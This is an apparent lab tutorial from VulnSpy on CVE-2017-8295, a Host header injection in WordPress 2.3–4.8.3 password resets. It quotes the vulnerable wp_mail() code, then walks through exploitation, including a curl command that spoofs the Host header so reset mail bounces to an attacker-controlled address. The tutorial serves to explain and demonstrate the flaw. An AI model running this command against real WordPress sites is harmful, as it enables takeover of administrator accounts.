CVE-2017-8295: WordPress 2.3-4.8.3 Unauthorized Password Reset/Host Header Injection Vulnerability Exploit


WordPress is the most widely used content management system nowadays. According to w3tech statistics, around 30% of the world's Web sites are based on WordPress.

WordPress 2.3-4.8.3 password reset function directly uses the HTTP_HOST as part of the password reset mail's header, which can be exploited by an attacker to steal the content of the password reset mail.

In this article, we will use VulnSpy's online WordPress environment to demonstrate the exploit of this vulnerability.


ANALYSIS

In WordPress, the wp_mail ()function is used to send mail, and if the From address is not set during the sending process, the 'wordpress@' + $_SERVER ['SERVER_NAME'] will be used as the From address of the mail. In most Web servers, the SERVER_NAME variable comes from the HTTP_HOST header in the client request, which means that the From address is user-controlled.

The declaration of function wp_mail() is in file WordPress/wp-includes/pluggable.php :

function wp_mail( $to, $subject, $message, $headers = '', $attachments = array() ) {
...//ignore
    if ( !isset( $from_email ) ) {
        // Get the site domain and get rid of www.
        $sitename = strtolower( $_SERVER['SERVER_NAME'] );
        if ( substr( $sitename, 0, 4 ) == 'www.' ) {
            $sitename = substr( $sitename, 4 );
        }
        $from_email = 'wordpress@' . $sitename;
    }
    /**
     * Filters the email address to send from.
     *
     * @since 2.2.0
     *
     * @param string $from_email Email address to send from.
     */
    $from_email = apply_filters( 'wp_mail_from', $from_email );
    /**
     * Filters the name to associate with the "from" email address.
     *
     * @since 2.3.0
     *
     * @param string $from_name Name associated with the "from" email address.
     */
    $from_name = apply_filters( 'wp_mail_from_name', $from_name );
    $phpmailer->setFrom( $from_email, $from_name );
...//ignore
}

In some cases, the mail server will directly use the From address as Return-Path. And when the sending mail fails, the message will be forwarded to the Return-Path address automatically. In WordPress, password reset mail can be sent to a malicious mail server because the From Address is user-controlled.


EXPLOIT

1. Click the START TO HACK button on the top right side of the page, and use VSPlate to create online environment (automatically).

2. Install WordPress

Note: The administrator e-mail address here is set to a nonexistent e-mail address demo@vulnspy.ooo, which simulates a DNS/DOS attack that causes administrators to fail to send password-reset mail.

3. Log into VSPlate Online Terminal

4. Create an email account like wordpress@yourdomain.com

Note: yourdomain.com is your own domain name. You can use the free enterprise email to set e-mail addresses. We use wordpress@vulnspy.com in the demonstration.

5. Send password reset requests via the online terminal and modifies the HTTP_HOST header.

We use the online terminal to simulate the attack on the WordPress website of the intranet.

Run command in online terminal:

curl -v 'http://127.0.0.1/wp-login.php?action=lostpassword' -H 'Host: vulnspy.com' --data 'user_login=admin&redirect_to=&wp-submit=Get+New+Password'

If the sending mail fails, the message will be forwarded to wordpress@vulnspy.com automatically. That is to say, the mail to send the administrator demo@vulnspy.ooo will be sent to wordpress@vulnspy.com.

6. Using wordpress@vulnspy.com to receive mail

If successful, wordpress@vulnspy.com will receive a password reset mail.

7. Reset Password

REFERENCE

All rights reserved. © 2018 VULNSPY